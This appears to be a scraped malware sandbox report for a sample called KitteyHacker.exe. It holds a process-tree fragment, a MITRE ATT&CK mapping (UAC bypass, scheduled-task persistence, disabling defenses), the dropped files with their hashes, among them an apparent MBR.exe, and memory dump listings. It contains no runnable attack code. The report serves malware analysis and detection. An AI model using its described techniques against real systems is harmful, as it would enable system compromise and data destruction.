PID:880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1165617219-120673698-2039804206-4680867810664329991155806362-1994651857-1613907526"
1⤵
PID:596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11244274091944253927-525931271-127274299-758902436129725465535930459-730548451"
1⤵
PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WEWWZC8O\KitteyHacker[1].exe

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\C9B6.bat

Filesize
11KB

MD5
b7a328520d4363afd3cbb8ba50ead6d5

SHA1
5a29ad845f63fa670577c89afaeeb34e9fe032c2

SHA256
a8cbd116c09512885ccaccd7efc41772542fa071ac0a032927a07ae93457b683

SHA512
16c89c7ef563caaa4b507414e871a9d62b7b5a3ef33a182ff2b519dacaa3445000389bfa586e1c977107ff7b4bb1adac11e3a7a1c57e8ef927bf89ef7b82710c

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\KHD.exe

Filesize
70KB

MD5
5e85416ac8975e649a325ffb114f18cb

SHA1
ff47cbe62cbb5a87c9b9aa67e58af7aac0d716cb

SHA256
7eb960ca0917a2f6366006d73c213c69ccdc269fb790510bbd93be75bab7468c

SHA512
e0b8a73ef39a62919df0f8c268cbce614ae13f959fdec10630595d23b1770132cdb83f62304f6518c14c7118e9b2ebbe762df722da9d246c06d101279dc69098

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\KitteyHacker.exe

Filesize
11.2MB

MD5
583fed9d3c3c36575b428320e8335576

SHA1
d3a88c9c9be904200ab051615be3f6de5fbd59f8

SHA256
299522353a7b61e4da1b9e2cfa9f16f15d2ab46f6e0431d46abca5a0c6eb7b07

SHA512
2180e096cf8bdb6def2cf6fd66cec89a4083878c6588cd80f589ebbf7d4a5b7880e0b21b116e3275c265b95b03c882a8e4816463540415a91b1e3dd8f9794045

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\KitteyHacker.exe

Filesize
11.2MB

MD5
06b3640b85125af27bf4b92f3c129c8c

SHA1
3e6de220cf589f9b23e4bb61e2d4791b7b2fe27c

SHA256
061b19d4fa64ab86c7c1803d604e2c3d783ba05883cc82b12c9ce9a7fa612cca

SHA512
64cd7290f066156101916ce50fdf31483a5327f8e3c21c18459b8db7736d01bef93960ef66604de34901b2d7db7d6191edc0e793ccbb27dd5a4a82e9df3c093e

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\KitteyHacker.mp3

Filesize
2.8MB

MD5
8acfdecc2c9b0d1097b1bdd3234433fd

SHA1
34afcf3080fb10aee8e2f3650abd43a80518f257

SHA256
a816e156a4e7eabe773ed8e8a1ffda5b3dd402636a798e6f454c4a9a1e5036ea

SHA512
ed61cf115d84e090bd52332580363c34b735504bbe1ffdd96764a4d4281e28585b11d8fed53f4e42ba4c0fb96d56046b6da3fdea57cf3f5e893dc341ad0be620

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\Kitty.mp3

Filesize
1.8MB

MD5
fec06f68e4994afdb678d0702617ddc5

SHA1
8748c25ca9773df70b80556887fb0d5f232fc43e

SHA256
30a83dfb77f2aed05fed9edf0bc1a3866abf402184b0fa7d70e04ef5101c9156

SHA512
a8f047e74804173595e8d6121bbea6c27524fbd397559f4c8c5e57edffe6cc91749f5bf76cebb454e58a11971fe09b956fa8eecbd5f710a824d3ac16ab718e08

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\MBR.exe

Filesize
390KB

MD5
f11bd64fef20c74c6fb9996cd24a511b

SHA1
f593f2239616ed73a142b4852cf89b37a1437d5b

SHA256
c7dc9a3605392bb0cacf3bdcb03c533e6dd1fd5294f6957bcdfd550ac424499b

SHA512
52c0c2571a11f9bedfac27e5c13d31175704330d7a13ea51b5012dd19cd415b5fe9ecb0e8727060482638288800bed91130a390502222b2b3f29c30e04beab2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\Protogent.mp3

Filesize
2.7MB

MD5
f56e35586cea4220bd7a93a85b3305f8

SHA1
feb8acf1b5549c7b8b571da3700eb590d3f57e64

SHA256
8d6c86e8dd1ed05bb568a28905a12f7a7e394f9e1b3db6814ef233d6c0e5b250

SHA512
25cd2beb8fd2d99f862fe0d12b98f66d10a9b95f98135e41e5b0a7afa2357a72547fb4d141103a19ed84ece3fa42c34c912fff870414a40a0b5200bcdff540b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\SM.exe

Filesize
1.1MB

MD5
ec514dc25cda916bb9269504523061d5

SHA1
955acd5fe35c1064cf4723471880d1cbb34b3738

SHA256
9794204a5aaf3298d309568924fc32a9862a1892e69b4d01e78918ea0586711a

SHA512
9c8e0dae1e8eca6f3fd93fbd558f36e42cd2431da04844a97bfece4204a7a2f38f6a72ce82c32406e8699710820413dd1e12c8567b315d989ef2437a90939720

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\SM.exe

Filesize
1.1MB

MD5
ec514dc25cda916bb9269504523061d5

SHA1
955acd5fe35c1064cf4723471880d1cbb34b3738

SHA256
9794204a5aaf3298d309568924fc32a9862a1892e69b4d01e78918ea0586711a

SHA512
9c8e0dae1e8eca6f3fd93fbd558f36e42cd2431da04844a97bfece4204a7a2f38f6a72ce82c32406e8699710820413dd1e12c8567b315d989ef2437a90939720

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\ext\php_squall.dll

Filesize
126KB

MD5
6ff84bc8812b8c079fa6de68cf36ab59

SHA1
ca8789bbd7b0193221f9518e6b2f5b319c32b717

SHA256
7587e29919a56b6f94675e49208e1ae908bcab09363734d846502c3b4ad54326

SHA512
5ef9d9c1038b055186147cbfcfbedf54d6ecc235468ef4968630eb03368cf2c3f39dd600f1ebf9ecfe9b7cc134235b01a983a4fe9b6f292775244f837ec2e81f

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\php5ts.dll

Filesize
6.5MB

MD5
c9aff68f6673fae7580527e8c76805b6

SHA1
bb62cc1db82cfe07a8c08a36446569dfc9c76d10

SHA256
9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4

SHA512
c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56

Download Submit
C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\squall.dll

Filesize
544KB

MD5
0c7ab1951a9aa0ffd1107327020f0fce

SHA1
5192f8dae5541dd54e8de3851b28d2a04d54af57

SHA256
273fcce130ccf8f14201049590721b5c12ac95f696dce9c83e9fee3914c9434e

SHA512
0e5c7cfc965b8545b43b36d24eda90e2118d359992dbf4c1ad80199e93d436841aed14e2b59eb53c1c8b3d02d38ae9b557e1abca6215823f18d90c976ad8b8b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6FB6.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\Downloads\KitteyHacker.exe

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
C:\Users\Admin\Downloads\KitteyHacker.exe.prdpn8x.partial

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
\Users\Admin\AppData\Local\Temp\C9B5.tmp\SM.exe

Filesize
1.1MB

MD5
ec514dc25cda916bb9269504523061d5

SHA1
955acd5fe35c1064cf4723471880d1cbb34b3738

SHA256
9794204a5aaf3298d309568924fc32a9862a1892e69b4d01e78918ea0586711a

SHA512
9c8e0dae1e8eca6f3fd93fbd558f36e42cd2431da04844a97bfece4204a7a2f38f6a72ce82c32406e8699710820413dd1e12c8567b315d989ef2437a90939720

Download Submit
\Users\Admin\AppData\Local\Temp\C9B5.tmp\ext\php_squall.dll

Filesize
126KB

MD5
6ff84bc8812b8c079fa6de68cf36ab59

SHA1
ca8789bbd7b0193221f9518e6b2f5b319c32b717

SHA256
7587e29919a56b6f94675e49208e1ae908bcab09363734d846502c3b4ad54326

SHA512
5ef9d9c1038b055186147cbfcfbedf54d6ecc235468ef4968630eb03368cf2c3f39dd600f1ebf9ecfe9b7cc134235b01a983a4fe9b6f292775244f837ec2e81f

Download Submit
\Users\Admin\AppData\Local\Temp\C9B5.tmp\php5ts.dll

Filesize
6.5MB

MD5
c9aff68f6673fae7580527e8c76805b6

SHA1
bb62cc1db82cfe07a8c08a36446569dfc9c76d10

SHA256
9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4

SHA512
c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56

Download Submit
\Users\Admin\AppData\Local\Temp\C9B5.tmp\squall.dll

Filesize
544KB

MD5
0c7ab1951a9aa0ffd1107327020f0fce

SHA1
5192f8dae5541dd54e8de3851b28d2a04d54af57

SHA256
273fcce130ccf8f14201049590721b5c12ac95f696dce9c83e9fee3914c9434e

SHA512
0e5c7cfc965b8545b43b36d24eda90e2118d359992dbf4c1ad80199e93d436841aed14e2b59eb53c1c8b3d02d38ae9b557e1abca6215823f18d90c976ad8b8b4

Download Submit
memory/2708-113-0x0000000000040000-0x00000000001A7000-memory.dmp

Filesize
1.4MB

Download
memory/2940-99-0x0000000008D20000-0x0000000008D21000-memory.dmp

Filesize
4KB

Download
memory/2940-104-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2940-105-0x0000000008D20000-0x0000000008D21000-memory.dmp

Filesize
4KB

Download
memory/2940-97-0x0000000002090000-0x0000000002129000-memory.dmp

Filesize
612KB

Download
memory/2940-110-0x000000000AC30000-0x000000000AD97000-memory.dmp

Filesize
1.4MB

Download
memory/2940-95-0x0000000000280000-0x00000000002AA000-memory.dmp

Filesize
168KB

Download
memory/2940-112-0x000000000AC30000-0x000000000AD97000-memory.dmp

Filesize
1.4MB

Download
memory/2940-90-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads